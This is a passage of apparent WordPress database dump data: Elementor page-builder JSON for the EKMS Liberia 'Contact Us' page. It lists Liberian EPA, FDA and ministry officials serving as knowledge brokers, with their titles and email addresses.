_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14946,2373,'_elementor_edit_mode','builder'),(14947,2373,'_elementor_template_type','wp-page'),(14948,2373,'_elementor_version','2.7.5'),(14949,2373,'_wp_page_template','default'),(14950,2373,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further 